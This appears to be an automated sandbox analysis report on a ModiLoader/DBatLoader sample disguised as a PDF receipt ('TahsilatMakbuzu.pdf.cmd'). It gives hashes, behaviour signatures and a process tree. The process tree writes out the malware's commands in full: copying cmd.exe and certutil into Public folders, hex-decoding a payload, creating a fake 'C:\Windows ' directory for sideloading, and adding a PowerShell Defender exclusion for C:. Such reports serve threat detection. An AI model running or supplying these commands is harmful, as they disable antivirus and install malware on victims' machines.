Analysis
-
max time kernel
147s -
max time network
142s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
-
submitted
12-06-2024 15:55
General
-
Target
TahsilatMakbuzu.pdf.cmd
-
Size
3.1MB
-
MD5
954ce5748eb4c9443e5f371e9011ed49
-
SHA1
46141d9c529a1445dc7f749252eceb1d534e1f7f
-
SHA256
08966de468601537e7b35dca3795e41b124d9d3849caefae0e9e7eae182cc57b
-
SHA512
3a6d243ce8a26fac7a11dc4fda7816c6f46f7041cfd6808dc110738c6f56fdcd0e19b295cd70ecfb4bbc4628a8076c7026113007c1e2db1b86b49819e61ae1fe
-
SSDEEP
49152:dmcZjA7xaJ7ArADAFbceewfaoiq440nE2uNfANfWiHtB:P
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
ModiLoader Second Stage 64 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Executes dropped EXE 9 IoCs
-
Loads dropped DLL 1 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 44 IoCs
-
Suspicious behavior: MapViewOfSection 5 IoCs
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
-
Suspicious use of WriteProcessMemory 40 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\TahsilatMakbuzu.pdf.cmd"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\extrac32.exeC:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"3⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe4⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\TahsilatMakbuzu.pdf.cmd" "C:\\Users\\Public\\Audio.mp4" 93⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\TahsilatMakbuzu.pdf.cmd" "C:\\Users\\Public\\Audio.mp4" 94⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Audio.mp4" "C:\\Users\\Public\\Libraries\\Audio.pif" 123⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Audio.mp4" "C:\\Users\\Public\\Libraries\\Audio.pif" 124⤵
- Executes dropped EXE
-
C:\Users\Public\Libraries\Audio.pifC:\Users\Public\Libraries\Audio.pif3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c mkdir "\\?\C:\Windows "4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c mkdir "\\?\C:\Windows \System32"4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c "C:\\Windows \\System32\\cmd.pif"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows \System32\cmd.pif"C:\\Windows \\System32\\cmd.pif"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\extrac32.exeC:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Audio.pif C:\\Users\\Public\\Libraries\\Zgogjvvq.PIF4⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S3⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Audio.mp4" / A / F / Q / S3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\rekeywiz.exe"C:\Windows\SysWOW64\rekeywiz.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3028,i,7977653611488681184,6839495125838449898,262144 --variations-seed-version --mojo-platform-channel-handle=1716 /prefetch:81⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_idufbwm1.h1f.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Public\Audio.mp4Filesize
2.1MB
MD5149079bc538972616b3a9f44fc53b41f
SHA1ed4fc843ced81189e5a258520b7d71ea464da0ee
SHA256bd39c5f12455291d139a62fce8f7d7ef47eecf6ef771412313f346afef617452
SHA512e72b4924d6834752da752a84ff4b1bd5a864a2e90a7f592f00f8d61bbed38d650c3eff38c328e82f23be8f2347bf6a97f633928d2f9be8c3800a50868a09a652
-
C:\Users\Public\Libraries\Audio.pifFilesize
1.1MB
MD58036955d8364cbb236e6c7f995092243
SHA1b8fc5421c6b4e35624bb07ae2529f5173e779fdf
SHA256cc99da79d544c9516645fa86308c25efc25db4163e13eccefea0a7f2a89022a1
SHA512f03156de54fda5dfd4184885749b0c761a502f5ebb1399ed92e57369204e77b88870dbd94df71fbd6873b1f1a4fe66d08194af5963db6913b5e744fae21a6a3f
-
C:\Users\Public\alpha.exeFilesize
283KB
MD58a2122e8162dbef04694b9c3e0b6cdee
SHA1f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA51299e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397
-
C:\Users\Public\kn.exeFilesize
1.6MB
MD5bd8d9943a9b1def98eb83e0fa48796c2
SHA170e89852f023ab7cde0173eda1208dbb580f1e4f
SHA2568de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2
SHA51295630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b
-
C:\Windows \System32\cmd.pifFilesize
94KB
MD5869640d0a3f838694ab4dfea9e2f544d
SHA1bdc42b280446ba53624ff23f314aadb861566832
SHA2560db4d3ffdb96d13cf3b427af8be66d985728c55ae254e4b67d287797e4c0b323
SHA5126e775cfb350415434b18427d5ff79b930ed3b0b3fc3466bc195a796c95661d4696f2d662dd0e020c3a6c3419c2734468b1d7546712ecec868d2bbfd2bc2468a7
-
C:\Windows \System32\netutils.dllFilesize
109KB
MD5b388185438132c448b2136948627e9d3
SHA1d25dc09705a6bd8f9046835c6b8b45a6d35efc36
SHA256524f0127d0e96431e8b09725b21fb95ee0394f7ab0f3104458c8190b80accc6a
SHA51225b88f6d5eed03001cd90cf91dca8b374985e6060884d6bb105c48e1bb6e33b1ab309fdeff65048e21a4daee08331427bdc8b2648cdb16455a19824cba760d40
-
memory/4056-215-0x0000017A73B30000-0x0000017A73B52000-memory.dmpFilesize
136KB
-
memory/4896-73-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-40-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-30-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-28-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-33-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-34-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-39-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-35-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-36-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-45-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-68-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-80-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-88-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-92-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-90-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-89-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-86-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-85-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-84-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-83-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-82-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-81-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-79-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-78-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-77-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-76-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-75-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-74-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-32-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-71-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-46-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-31-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-58-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-67-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-66-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-65-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-63-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-62-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-60-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-59-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-87-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-55-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-53-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-54-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-52-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-72-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-50-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-49-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-64-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-47-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-61-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-57-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-44-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-56-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-43-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-51-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-42-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-41-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-48-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-69-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-29-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-70-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-38-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB
-
memory/4896-37-0x0000000002900000-0x0000000003900000-memory.dmpFilesize
16.0MB